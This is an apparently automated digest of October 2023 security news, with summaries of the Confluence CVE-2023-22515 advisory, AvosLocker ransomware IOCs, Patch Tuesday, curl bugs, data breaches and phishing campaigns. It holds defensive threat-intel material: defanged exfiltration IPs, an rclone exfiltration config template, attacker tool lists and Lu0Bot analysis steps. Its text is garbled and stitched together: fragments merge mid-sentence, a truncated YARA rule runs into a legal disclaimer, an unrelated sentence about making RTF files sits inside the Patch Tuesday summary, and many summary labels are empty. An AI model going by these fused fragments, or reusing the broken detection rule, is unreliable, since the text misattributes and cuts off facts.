The post Stayin’ Alive campaign targets high-profile Asian government and telecom entities. Is it linked to ToddyCat APT? appeared first on Security Affairs.
"Autosummary:
Cybersecurity company Check Point uncovered a malicious activity, tracked as Stayin’ Alive, that is targeting high-profile government and telecom entities in Asian countries, including Vietnam, Uzbekistan, Pakistan, and Kazakhstan. Pierluigi Paganini October 13, 2023 October 13, 2023 A cyberespionage campaign, tracked as Stayin’ Alive, targeted high-profile government and telecom entities in Asia. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @fwosar, @demonslay335, @billtoulas, @Ionut_Ilascu, @serghei, @BleepinComputer, @malwrhunterteam, @Seifreed, @LawrenceAbrams, @SophosXOps, @3xp0rtblog, @AlvieriD, @pcrisk, @cyber_int, and @LikelyMalware. "Autosummary:
- Santana v. 23andMe, Inc. complaint The plaintiffs ask for various financial reliefs against 23andMe, including restitution, lifetime credit monitoring, actual, compensatory, and statutory damages and penalties, punitive damages, and coverage of attorney"s fees. "This month, Microsoft has released 103 updates to Windows, Edge, Microsoft Office, and Exchange Server. This update also includes minor updates to Visual Studio. Three zero-days (CVE-2023-44487, CVE-2023-36563 and CVE-2023-41763) require "Patch Now" updates for both Windows and the Edge browser for this October update cycle.
Autosummary:
Windows This October, Microsoft released 13 critical updates and 68 patches rated as important to the Windows platform that cover the following key components: Windows Message Queuing Windows Win32K and Kernel Windows RDP, Layer 2 Tunnelling Protocol and Windows TCP/IP Windows Error Reporting Windows Common Log File System Driver Windows OLE, ODBC, and SQL Providers The key challenges relate to the critical updates to the Message Queuing feature in Windows. Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge) Microsoft Windows (both desktop and server) Microsoft Office Microsoft Exchange Server Microsoft Development platforms (NET Core, .NET Mitigations and workarounds Microsoft has published the following vulnerability related mitigations for this month"s Patch Tuesday release cycle: There are 15 Microsoft Message Queue updates this month, each with a published mitigation from Microsoft that notes, “if the Message Queuing service is enabled and listening on port 1801, then your system is vulnerable.”You can still generate RTF files using the Echo command in a DOS prompt, after setting the generator type, ANSI page, default language, character code, charset, and font. "The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-22515. This recently disclosed vulnerability affects certain versions of Atlassian Confluence Data Center and Server, enabling malicious cyber threat actors to obtain initial access to Confluence instances by creating unauthorized Confluence administrator accounts. Threat actors exploited CVE-2023-22515 as a zero-day to obtain access to victim systems and continue active exploitation post-patch. Atlassian has rated this vulnerability as critical; CISA, FBI, and MS-ISAC expect widespread, continued exploitation due to ease of exploitation.
CISA, FBI, and MS-ISAC strongly encourage network administrators to immediately apply the upgrades provided by Atlassian. CISA, FBI, and MS-ISAC also encourage organizations to hunt for malicious activity on their networks using the detection signatures and indicators of compromise (IOCs) in this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations.
For additional information on upgrade instructions, a complete list of affected product versions, and IOCs, see Atlassian’s security advisory for CVE-2023-22515.[1] While Atlassian’s advisory provides interim measures to temporarily mitigate known attack vectors, CISA, FBI, and MS-ISAC strongly encourage upgrading to a fixed version or taking servers offline to apply necessary updates.
Download the PDF version of this report:
Autosummary: Example configuration file templates are listed in the following Figures 1 and 2, which are populated with the credentials of the exfiltration point: [s3] type = env_auth = access_key_id = secret_access_key = region = endpoint = location_constraint = acl = server_side_encryption = storage_class = [minio] type = provider = env_auth = access_key_id = secret_access_key = endpoint = acl = The following User-Agent strings were observed in request headers. 8.0.0 8.0.1 8.0.2 8.0.3 8.0.4 8.1.0 8.1.1 8.1.3 8.1.4 8.2.0 8.2.1 8.2.2 8.2.3 8.3.0 8.3.1 8.3.2 8.4.0 8.4.1 8.4.2 8.5.0 8.5.1 Unauthenticated remote threat actors can exploit this vulnerability to create unauthorized Confluence administrator accounts and access Confluence instances.Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, FBI, and MS-ISAC. The following IP addresses were obtained from FBI investigations as of October 2023 and observed conducting data exfiltration: 170.106.106[.]16 43.130.1[.]222 152.32.207[.]23 199.19.110[.]14 95.217.6[.]16 (Note: This is the official rclone.org website) Additional IP addresses observed sending related exploit traffic have been shared by Microsoft.[3] DETECTION METHODS Network defenders are encouraged to review and deploy Proofpoint’s Emerging Threat signatures. "
Autosummary:
Check Point reports that "Stayin" Alive" uses various samples and variants of these loaders and payloads, often tailored to specific regional targets (language, filenames, themes). "Autosummary:
"It requires the use of a socks5 proxy to be enabled by the curl user, this is actually quite common when people request API"s for security testing, debugging, or other technical work - it is also common when probing Tor services using tools like curl as it typically requires a socks5 proxy to perform the request," Hickey told BleepingComputer in a conversation. Not as bad as we feared On Wednesday, Stenberg released curl 8.4.0 with fixes for two security vulnerabilities: a high-severity heap buffer overflow bug (CVE-2023-38545) and a low-severity cookie injection flaw (CVE-2023-38546). "Autosummary:
Shadow (Shadow) is a cloud gaming service providing users with high-end Windows PCs streamed to their local devices (PCs, laptops, smartphones, tablets, smart TVs), allowing them to run demanding AAA games on a virtual computer. "Autosummary:
" Vulnerability type Report quality Severity Critical Important Moderate Low Inference Manipulation High Medium Low $15,000 $10,000 $6,000 $6,000 $3,000 $2,000 $0 $0 Model Manipulation High Medium Low $15,000 $10,000 $6,000 $6,000 $3,000 $2,000 $0 $0 Inferential Information Disclosure High Medium Low $15,000 $10,000 $6,000 $6,000 $3,000 $2,000 $0 $0 Besides issues outlined in Microsoft"s Vulnerability Severity Classification for AI Systems, researchers are also encouraged to report vulnerabilities that result in: Altering Bing"s chat behavior across user boundaries, i.e., changing the AI in ways that could impact all other users. "Autosummary:
The list of devices impacted by the two zero-day bugs is extensive, and it includes: iPhone 8 and later iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later CISA added the two vulnerabilities [1, 2] to its Known Exploited Vulnerabilities Catalog last week, ordering federal agencies to secure their devices against incoming attacks. "Autosummary:
Ransom letter dropped in WS_FTP attack (Sophos X-Ops) Tracked as CVE-2023-40044 , the flaw is caused by a .NET deserialization vulnerability in the Ad Hoc Transfer Module, enabling unauthenticated attackers to execute commands on the underlying OS via HTTP requests remotely. "TuxCare has unveiled the addition of a new Extended Security Update (ESU) service for its Enterprise Support Service line up for AlmaLinux OS. The new ESU service enhances TuxCare’s comprehensive service portfolio for AlmaLinux OS, enabling organizations to achieve greater stability and predictability for their AlmaLinux systems. All services in the portfolio, including the newly announced ESU service as well as Essential Support, Live Patching, and Enhanced Support, are now offered to customers as a … More
The post TuxCare adds ESU service for stability and predictability in AlmaLinux systems appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
A closer examination of the command-and-control (C2) infrastructure has revealed a constantly evolving arsenal of loader variants dubbed CurLu, CurCore, and CurLog that are capable of receiving DLL files, executing remote commands, and launch a process associated with a newly generated file to which data from the server is written to. "This post analyzed the numerous phishing campaigns targeting users and organizations in Italy. Phishing is a ploy to trick users into revealing personal or financial information through an e-mail, Web site, and even through instant messaging. Particularly very popular is so-called brand phishing, which occurs when criminals impersonate the official website of a well-known brand […]
The post Phishing, the campaigns that are targeting Italy appeared first on Security Affairs.
"Autosummary:
The phenomenon in numbers Numerous reports from the Italian Postal Police (https://www.commissariatodips.it/index.html) confirm CERT-AgID’s weekly data (https://cert-agid.gov.it/category/news/) on phishing campaigns involving dozens of exploited brands, including Poste Italiane, Intesa Sanpaolo, Nexi, Inps, Agenzia delle Entrate and Zimbra.In this case, one must act immediately, without panic or fear: Immediately change the password of the targeted service; Activate two-factor authentication, if you have not already done so; Contact the targeted organisation and the police. "Autosummary:
In the updated advisory, the agencies share the following tools as being part of the arsenal of AvosLocker ransomware affiliates: Splashtop Streamer, Tactical RMM, PuTTy, AnyDesk, PDQ Deploy, Atera Agent remote administration tools for backdoor access Open-source network tunneling utilities: Ligolo, Chisel Adversary emulation frameworks Cobalt Strike and Sliver for command and control Lazagne and Mimikatz for harvesting credentials FileZilla and Rclone for data exfiltration Additional publicly available tools observed in AvosLocker attacks include Notepad++, RDP Scanner, and 7zip. "Ransomlooker monitors ransomware groups’ extortion sites and delivers consolidated feeds of their claims worldwide. Cybernews presented Ransomlooker, a tool to monitor ransomware groups’ extortion sites and delivers consolidated feeds of their claims worldwide. The researchers have created the tool to help cybersecurity experts in their daily jobs by providing real-time updates and actionable insights. It offers various […]
The post Ransomlooker, a new tool to track and analyze ransomware groups’ activities appeared first on Security Affairs.
"Autosummary:
"Categories: Exploits and vulnerabilities Categories: News Microsoft Threat Intelligence has revealed that it has been tracking the active exploitation of a vulnerability in Atlassian Confluence software since September 14, 2023. |
The post Update now! Atlassian Confluence vulnerability is being actively exploited appeared first on Malwarebytes Labs.
"Autosummary:
On the same day, Microsoft Threat Intelligence took to X (formerly Twitter), to say that a nation-state actor, codenamed Storm-0062, which it believes to be a nation-state actor working on behalf of China, had been exploiting CVE-2023-22515 since mid-September. "Categories: News Categories: Ransomware The Philippine Health Insurance Corporation (PhilHealth), has confirmed that it was unprotected by antivirus software when it was attacked by the Medusa ransomware group in September. |
The post Giant health insurer struck by ransomware didn"t have antivirus protection appeared first on Malwarebytes Labs.
"Autosummary:
In response, PhilHealth "strongly recommends changing passwords of online accounts, enabling multi-factor authentication, monitoring of suspicious activities in their online accounts, not opening and clicking suspicious emails and links, and not answering suspicious calls and text messages" The attack is a great example of how ransomware attacks aren"t really about computers, they are about the effects they have on people. According to a recent post on its Facebook account, all of the corporation"s public-facing applications have been back online since October 6, 2023, including "the website, Member Portal, eClaims for electronic submission of hospital claims, and EPRS for employer remittances.As the attack on Ireland"s Health Service Executive in 2021 showed, attacks on healthcare can create uncertainty, delays, enormous stress and legal jeopardy for staff, and the very real risk of pain, physical harm and even death for patients. "Autosummary:
"Autosummary:
"On October 10, 2023, Simpson Manufacturing Co., Inc. experienced disruptions in its Information Technology (IT) infrastructure and applications resulting from a cybersecurity incident," reads the statement. "Autosummary:
Storm-0062 is a state hacking group linked to China"s Ministry of State Security and known for targeting software, engineering, medical research, government, defense, and tech firms in the U.S., U.K., Australia, and various European countries to collect intelligence. "Categories: Threat Intelligence In September, two high-profile casino breaches taught us about the nuances of the RaaS affiliate landscape, the asymmetric dangers of phishing, and of two starkly different approaches to ransomware negotiation. |
The post Ransomware review: October 2023 appeared first on Malwarebytes Labs.
"Autosummary:
Known ransomware attacks by gang, September 2023 Known ransomware attacks by country, September 2023 Known ransomware attacks by industry sector, September 2023 Last month’s two high-profile casino breaches were an interesting case study in the nuances of the RaaS affiliate landscape, the asymmetric dangers of phishing, and of two starkly different approaches to ransomware negotiation.Scattered Spider, on the contrary, highlights the peril posed when ready-made RaaS software merges with seasoned experience: In both of their casino breaches, the group employed advanced tactics, techniques, and procedures (TTPs), including in-depth reconnaissance, social engineering, and advanced lateral movement techniques.Posted: October 11, 2023 by In September, two high-profile casino breaches taught us about the nuances of the RaaS affiliate landscape, the asymmetric dangers of phishing, and of two starkly different approaches to ransomware negotiation.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "Categories: Exploits and vulnerabilities Categories: News Tags: CISA Tags: KEV Tags: catalog Tags: vulnerabilities Tags: prioritize The CISA Known Exploited Vulnerabilities catalog has grown to cover more than 1,000 vulnerabilities since its launch in November 2021. |
The post CISA catalog passes 1,000 known-to-be-exploited vulnerabilities. Celebration time, or is it? appeared first on Malwarebytes Labs.
"Autosummary:
It"s hard to find metrics to show what the effect of the KEV catalog is on malware infections and ransomware attacks, but what is clear is that the mean-time-to-remediate listed vulnerabilities was an average of nine days faster than for non-listed – and 36 days faster for internet-facing vulnerabilities. On September 18, 2023, the Cybersecurity & Infrastructure Security Agency (CISA) announced that its Known Exploited Vulnerabilities (KEV) catalog has reached the milestone of covering more than 1,000 vulnerabilities since its launch in November 2021. "Autosummary:
"Autosummary:
"Autosummary:
Unfortunately, many organizations lack a comprehensive system to prevent password reuse, like blocking the use of weak, breached, or high-probability passwords. Solving the password reuse security gap with Specops Password Policy Specops Password Policy gives IT administrators the ability to enforce stronger password policies in Active Directory environments and mitigate the risk of reused and compromised passwords. "Autosummary:
"Autosummary:
"Autosummary:
In Europe, EU security agency ENISA warned in 2022 of a surge in zero-day exploits, ransomware-as-a-service, hackers-for-hire, supply chain attacks and social engineering. In fact, according to one study, only two-fifths (39%) of security decision makers believe their company leadership truly understands the role cybersecurity plays in business success.Thus, they can create that security-by-design culture that every organization should aspire to, and in so doing prove to sceptical boards that security should be embedded into every part of the business. "US CISA added the flaw CVE-2023-21608 in Adobe Acrobat Reader to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added five new flaws to its Known Exploited Vulnerabilities Catalog, including a high-severity flaw (CVE-2023-21608) (CVSS score: 7.8) in Adobe Acrobat Reader. The flaw is a use-after-free issue, an attacker can trigger the flaw to achieve […]
The post CISA adds Adobe Acrobat Reader flaw to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
"Airline Air Europa disclosed a data breach and warned customers to cancel their credit cards after threat actors accessed their card information. Air Europa is a Spanish airline and a subsidiary of the Globalia Corporation. It operates as a full-service carrier, providing passenger and cargo services to various destinations, both domestic and international. Air Europa […]
The post Air Europa data breach exposed customers’ credit cards appeared first on Security Affairs.
"Autosummary:
Air Europa data breach exposed customers’ credit cards Pierluigi Paganini October 11, 2023 October 11, 2023 Airline Air Europa disclosed a data breach and warned customers to cancel their credit cards after threat actors accessed their card information. "Microsoft Patch Tuesday security updates for October 2023 fixed three actively exploited zero-day vulnerabilities. Microsoft Patch Tuesday security updates for October 2023 addressed a total of 103 vulnerabilities in Microsoft Windows and Windows Components; Exchange Server; Office and Office Components; ASP.NET Core and Visual Studio; Azure; Microsoft Dynamics; and Skype for Business. Three of the […]
The post Microsoft Patch Tuesday updates for October 2023 fixed three actively exploited zero-day flaws appeared first on Security Affairs.
"Autosummary:
Microsoft Patch Tuesday updates for October 2023 fixed three actively exploited zero-day flaws Pierluigi Paganini October 11, 2023 October 11, 2023 Microsoft Patch Tuesday security updates for October 2023 fixed three actively exploited zero-day vulnerabilities. "Autosummary:
"Autosummary:
"We"ve kept the information restricted until today to give as many security vendors as possible the opportunity to react," explained Cloudflare "However, at some point, the responsible thing becomes to publicly disclose zero-day threats like this. "Autosummary:
The number of bugs in each vulnerability category is listed below: 26 Elevation of Privilege Vulnerabilities 3 Security Feature Bypass Vulnerabilities 45 Remote Code Execution Vulnerabilities 12 Information Disclosure Vulnerabilities 17 Denial of Service Vulnerabilities 1 Spoofing Vulnerabilities The total count of 104 flaws does not include one Chromium vulnerability tracked as CVE-2023-5346, which was fixed by Google on October 3rd and ported to Microsoft Edge. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known IOCs, TTPs, and detection methods associated with the AvosLocker variant identified through FBI investigations as recently as May 2023. AvosLocker operates under a ransomware-as-a-service (RaaS) model. AvosLocker affiliates have compromised organizations across multiple critical infrastructure sectors in the United States, affecting Windows, Linux, and VMware ESXi environments. AvosLocker affiliates compromise organizations’ networks by using legitimate software and open-source remote system administration tools. AvosLocker affiliates then use exfiltration-based data extortion tactics with threats of leaking and/or publishing stolen data.
This joint CSA updates the March 17, 2022, AvosLocker ransomware joint CSA, Indicators of Compromise Associated with AvosLocker ransomware, released by FBI and the Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN). This update includes IOCs and TTPs not included in the previous advisory and a YARA rule FBI developed after analyzing a tool associated with an AvosLocker compromise.
FB "
Autosummary:
YARA Rule rule NetMonitor { meta: author = "FBI" source = "FBI" sharing = "TLP:CLEAR" status = "RELEASED" description = "Yara rule to detect NetMonitor.exe" category = "MALWARE" creation_date = "2023-05-05" strings: $rc4key = {11 4b 8c dd 65 74 22 c3} $op0 =Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.Specifically, affiliates use: Remote system administration tools—Splashtop Streamer, Tactical RMM, PuTTy, AnyDesk, PDQ Deploy, and Atera Agent—as backdoor access vectors [T1133]. REPORTING The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with AvosLocker affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Table 3: AvosLocker Affiliates ATT&CK Techniques for Initial Access Initial Access Technique Title ID Use External Remote Services T1133 AvosLocker affiliates use remote system administration tools—Splashtop Streamer, Tactical RMM, PuTTy, AnyDesk, PDQ Deploy, and Atera Agent—to access backdoor access vectors. to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document.Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud). This joint CSA updates the March 17, 2022, AvosLocker ransomware joint CSA, Indicators of Compromise Associated with AvosLocker ransomware, released by FBI and the Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN). FBI has also observed AvosLocker affiliates: Use custom PowerShell [T1059.001] and batch ( .bat ) scripts [T1059.003] for lateral movement, privilege escalation, and disabling antivirus software.e8} condition: uint16(0) == 0x5A4D and filesize < 50000 and any of them } MITRE ATT&CK TACTICS AND TECHNIQUES See Tables 3-7 for all referenced threat actor tactics and techniques in this advisory. Download the PDF version of this report: For a downloadable copy of IOCs, see: TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. "Autosummary:
"The first variant does not immediately cancel the streams, but instead opens a batch of streams at once, waits for some time, and then cancels those streams and then immediately opens another large batch of new streams," Juho Snellman and Daniele Lamartino said. "Autosummary:
"Vulnerabilities like this are often the starting point for a "one-click" exploit, which compromise the victim"s device when they visit a malicious website," security researcher Man Yue Mo said. "Autosummary:
The disclosure comes as Fortinet FortiGuard Labs uncovered an updated version of the IZ1H9 Mirai-based DDoS campaign that makes use of a revised list of exploits targeting various flaws in IP cameras and routers from D-Link, Geutebrück, Korenix, Netis, Sunhillo SureLine, TP-Link, TOTOLINK, Yealink, and Zyxel. "Autosummary:
"Autosummary:
A threat actor named Gookee has been previously associated with malware and hacking activity, attempting to sell access to Sony Network Japan in 2020, linked to a Ransomware-as-a-Service operation called "Gookee Ransomware," and trying to sell malware source code on a hacker forum. "Autosummary:
"This event will significantly affect court operations across the Circuit, impacting courts in Escambia, Okaloosa, Santa Rosa, and Walton counties, for an extended period," a statement published on the court"s website says. "Autosummary:
" While successful exploitation of CVE-2023-43641 requires tricking a potential victim into downloading a .cue file, admins are advised to patch systems and mitigate the risks posed by this security flaw, as it provides code execution on devices running the latest releases of widely used Linux distros, including Debian, Fedora, and Ubuntu. "Categories: Podcast This week on the Lock and Code podcast, we speak with Bay Area teenager Nitya Sharma—for the second year in a row—about what she"s most worried about online and what she does to stay safe. |
The post AI sneak attacks, location spying, and definitely not malware, or, what one teenager fears online: Lock and Code S04E21 appeared first on Malwarebytes Labs.
"Autosummary:
Titled "Everyone"s afraid of the internet and no one"s sure what to do about it," Malwarebytes" new report shows that 81 percent of Gen Z worries about having personal, private information exposed—like their sexual orientations, personal struggles, medical history, and relationship issues (compared to 75 percent of non-Gen Zers). "Autosummary:
" In the latest set of attacks documented by Menlo Security, victims are sent phishing emails with a deceptive link pointing to Indeed, which, in turn, redirects the individual to an EvilProxy page to harvest the credentials entered. "Autosummary:
Flaws have also been unearthed in the communication protocol (i.e., MQTT) used between the devices and the cloud, including the use of hard-coded authentication credentials, that could be used to register a rogue device and access MQTT messages containing device identifiers, Wi-Fi settings, SSIDs, and passwords from routers. "Autosummary:
"Autosummary:
Based on the data samples posted by the ransomware gang, the hackers managed to steal customer and employee information, including names, addresses, phone numbers, tax records, and SSNs. "Autosummary:
A separate notice was sent to impacted individuals yesterday, informing them that the following details have been exposed to the cyber criminals, which varies depending on the individual: Full name Phone number Email address Postal address Gender Date of birth Driver’s license Social Security Number (SSN) Passport number MGM concludes that its investigation has not unearthed signs that the incident exposed customer passwords, bank account numbers, and payment card information. "Autosummary:
The FTC advised U.S. consumers today to exercise caution and safeguard themselves against such scams, encouraging individuals at risk to restrict their social media posts and contacts, reaching out directly by phone if someone, even a purported friend or relative, solicits money through social media. "Autosummary:
"Autosummary:
A separate notice was sent to impacted individuals yesterday, informing them that the following details have been exposed to the cyber criminals, which varies depending on the individual: Full name Phone number Email address Postal address Gender Date of birth Driver’s license Social Security Number (SSN) Passport number MGM concludes that its investigation has not unearthed signs that the incident exposed customer passwords, bank account numbers, and payment card information. "Autosummary:
As part of the settlement, Blackbaud also has to: Implement and maintain a breach response plan Provide appropriate assistance to its customers in the event of a breach Report security incidents to its CEO and board and provide enhanced employee training Implement personal information safeguards and controls requiring total database encryption and dark web monitoring Improve defenses via network segmentation, patch management, intrusion detection, firewalls, access controls, logging and monitoring, and penetration testing Allow third-party assessments of its compliance with the settlement for seven years Ransomware attack fallout In its 2020 Q3 Quarterly report, the company revealed three years ago that at least 43 state Attorneys Generals and the District of Columbia were looking into the incident. "Categories: News Categories: Scams A very convincing Amazon Prime scam landed in our mail server today and...went straight to spam. Here"s why. |
The post Amazon Prime email scammer snatches defeat from the jaws of victory appeared first on Malwarebytes Labs.
"Autosummary:
It"s about a malicious email that failed hard because, for all that it got right, it got the most important thing wrong, all but guaranteeing itself a inevitable, rapid, one way trip to the spam trap. The premise is plausible, the colours look right, the logo does too, and the sign off, "Amazon.co.uk Customer Service", correctly placed me in the UK. Because its address might look weird to an email scanning engine, or an eagle-eyed recipient, the furniture site is reached via an open redirect on Russia"s answer to Facebook, VKontakte, which is a large and well established website that won"t ring any alarm bells. "Autosummary:
Improper separation of user/administrator privilege Insufficient internal network monitoring Lack of network segmentation Poor patch management Bypass of system access controls Weak or misconfigured multifactor authentication (MFA) methods Insufficient access control lists (ACLs) on network shares and services Poor credential hygiene Unrestricted code execution There"s no doubt that problems like these are present in many organisations, both private and public sector. "Autosummary:
"New cybersecurity findings pinpoint areas where cybersecurity experts are lacking, with interpersonal skills, cloud computing, and security measures standing out as the most prominent skill deficiencies in cybersecurity specialists, according to a new ISACA report. 59 percent of cybersecurity leaders say their teams are understaffed. 50 percent of respondents indicated job openings for nonentry-level roles, compared to 21 percent with job openings for entry-level positions. Cybersecurity talent retention struggles persist Strides have been made in … More
The post Soft skills continue to challenge the cybersecurity sector appeared first on Help Net Security.
"Autosummary:
DevSecOps (36 percent) When looking at soft skills, communication (58 percent), critical thinking (54 percent), problem-solving (49 percent), teamwork (45 percent), and attention to detail (36 percent) come in as the top five skills employers are seeking in cybersecurity job candidates. "Autosummary:
"Autosummary:
"Cameras are coming to a connected device near you. Cheap image sensors from old mobile phones are flooding the market and bringing video to the Internet of Things (IoT). Vacuum cleaners, bird feeders, connected cars and even smart ovens now come loaded with cameras that recognize the dish and suggest remaining cooking times. This is a major shift in the functionality of connected devices, which now number more than 15 million globally. At the same … More
The post Eyes everywhere: How to safely navigate the IoT video revolution appeared first on Help Net Security.
"Autosummary:
To navigate this evolution, device creators must ensure safety, and users should customize, decentralize, and prioritize trusted brands.Moreover, these connections are encrypted to ensure that data is authenticated, confidential, and uncompromised. Vacuum cleaners, bird feeders, connected cars and even smart ovens now come loaded with cameras that recognize the dish and suggest remaining cooking times. "Autosummary:
"A vulnerability (CVE-2023-4911) in the GNU C Library (aka “glibc”) can be exploited by attackers to gain root privileges on many popular Linux distributions, according to Qualys researchers. About CVE-2023-4911 Dubbed “Looney Tunables”, CVE-2023-4911 is a buffer overflow vulnerability in the dynamic loader’s processing of the GLIBC_TUNABLES environment variable. To exploit it, attackers first need to establish access to the system. “The GNU C Library, commonly known as glibc, is the C library in the … More
The post “Looney Tunables” bug allows root access on Linux distros (CVE-2023-4911) appeared first on Help Net Security.
"Autosummary:
"Apple has released a security update for iOS and iPadOS to fix another zero-day vulnerability (CVE-2023-42824) exploited in the wild. About CVE-2023-42824 CVE-2023-42824 is a kernel vulnerability that could allow a local threat actor to elevate its privileges on affected iPhones and iPads. “Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.6,” the company stated. The vulnerability affects the following devices: iPhone XS … More
The post Apple patches another iOS zero-day under attack (CVE-2023-42824) appeared first on Help Net Security.
"Autosummary:
"Atlassian has fixed a critical zero-day vulnerability (CVE-2023-22515) in Confluence Data Center and Server that is being exploited in the wild. “Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances,” the company said. About CVE-2023-22515 Atlassian describes CVE-2023-22515 as a critical … More
The post Critical Atlassian Confluence zero-day exploited by attackers (CVE-2023-22515) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Start a free trial Technical analysis of Lu0Bot malware using a disassembler and debugger To access the main JS code, the team: Unpacked the SFX archive Ran a command to collect the Node.js file Launched fjlpexyjauf.exe in x32dbg, entering the incoming data into the command line Got to the point where JS code execution started Located the code in memory and saved a dump To see how the unpacking and dump extraction processes were conducted, refer to the original article. Domain construction Debugging the JavaScript code To debug, the team used Node.js with its inspect-brk parameter (node.exe –inspect-brk *obfuscate dump without garbage bytes*), placing a breakpoint on the "var" keyword and observing the output generated by each line. Contents of eqnyiodbs files 3. lknidtnqmg.dat file This file had encrypted bytes in Base64, which could be decrypted using the given input number. "Autosummary:
"Autosummary:
"Autosummary:
The British company provides mobile telecommunications and voice IP (VoIP) services in 60 countries, including the United States, the U.K., Germany, Australia, France, Italy, and the Netherlands. "Autosummary:
"Autosummary:
Mitigations that would have this effect include: eliminating default credentials and hardening configurations, deactivating unused services and implementing stringent access controls, ensuring regular updates and automating the patching process, giving priority to patching known vulnerabilities that have been exploited, and reducing, restricting, auditing, and closely monitoring administrative accounts and privileges. "Categories: Business MITRE Engenuity released its 2023 ATT&CK Evaluation results, with Malwarebytes blocking initial malware execution and earning high marks for detection. |
The post 2023 MITRE ATT&CK® Evaluation results: Malwarebytes earns high marks for detection, blocks initial malware executions appeared first on Malwarebytes Labs.
"Autosummary:
In sum, while the MITRE ATT&CK Evaluation is undoubtedly important, its results are best considered alongside other independent tests such as MRG Effitas 360° Assessment & Certification, G2 peer-to-peer evaluations, AV-Test, and more. "Categories: Business Categories: News Categories: Ransomware Tags: Sony Tags: RansomedVC Tags: Cl0p Tags: ransomware Tags: data breach Tags: MOVEit Sony has confirmed a ransomware attack in June and is investigating claims of a second, more recent one. |
The post Sony was attacked by two ransomware operators appeared first on Malwarebytes Labs.
"Autosummary:
The disputed dataset contained details for the SonarQube platform, certificates, Creators Cloud, incident response policies, a device emulator for generating licenses, and more.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. While the FBI has warned of multiple ransomware attacks on the same victim, neither of these ransomware groups are on their list of ransomware variants that are used in these double attacks, so it is doubtful that this was the play here. "Businesses are taking cybersecurity more seriously by boosting resources and preparedness, according to GetApp. US businesses on the whole are gaining ground against cybercriminals after several years of increasingly severe threats, but the Las Vegas cyberattacks are a stark reminder of the cost of a breach. GetApp’s report reveals that the ransomware rate remains alarmingly high at 37%, despite meaningful improvements over the last year. While there is still work to be done, increased investments … More
The post Cybersecurity preparedness pays big dividends for businesses appeared first on Help Net Security.
"Autosummary:
Phishing effectiveness has cooled from last year’s critical high: 80% of businesses report receiving phishing emails this year (from 89% in 2022), and 61% say their employees clicked on a malicious link (from 81% in 2022). "Autosummary:
"Threat actors exploited an open redirection vulnerability in the job search platform Indeed to carry out phishing attacks. Researchers from the cybersecurity firm Menlo Security reported that threat actors exploited an open redirection vulnerability in the job search platform Indeed in phishing attacks. The phishing attacks were aimed at senior executives across various industries, primarily […]
The post Phishing campaign targeted US executives exploiting a flaw in Indeed job search platform appeared first on Security Affairs.
"Autosummary:
Phishing campaign targeted US executives exploiting a flaw in Indeed job search platform Pierluigi Paganini October 04, 2023 October 04, 2023 Threat actors exploited an open redirection vulnerability in the job search platform Indeed to carry out phishing attacks. "Autosummary:
The leaked dataset that at least two separate threat actors held, contained details for the SonarQube platform, certificates, Creators Cloud, incident response policies, a device emulator for generating licenses, and more. "Qualcomm has fixed three actively exploited vulnerabilities (CVE-2023-33106, CVE-2023-33107, CVE-2023-33063) in its Adreno GPU and Compute DSP drivers. Vulnerabilities exploited in Qualcomm GPU and DSP drivers The US-based semiconductor company has been notified by Google Threat Analysis Group and Google Project Zero that CVE-2023-33106, CVE-2023-33107, CVE-2023-33063, and CVE-2022-22071 “may be under limited, targeted exploitation”. CVE-2022-22071 is an older use-after-free vulnerability found in Automotive Android OS and patched in May 2022. Additional information about the three … More
The post Qualcomm patches 3 actively exploited zero-days appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
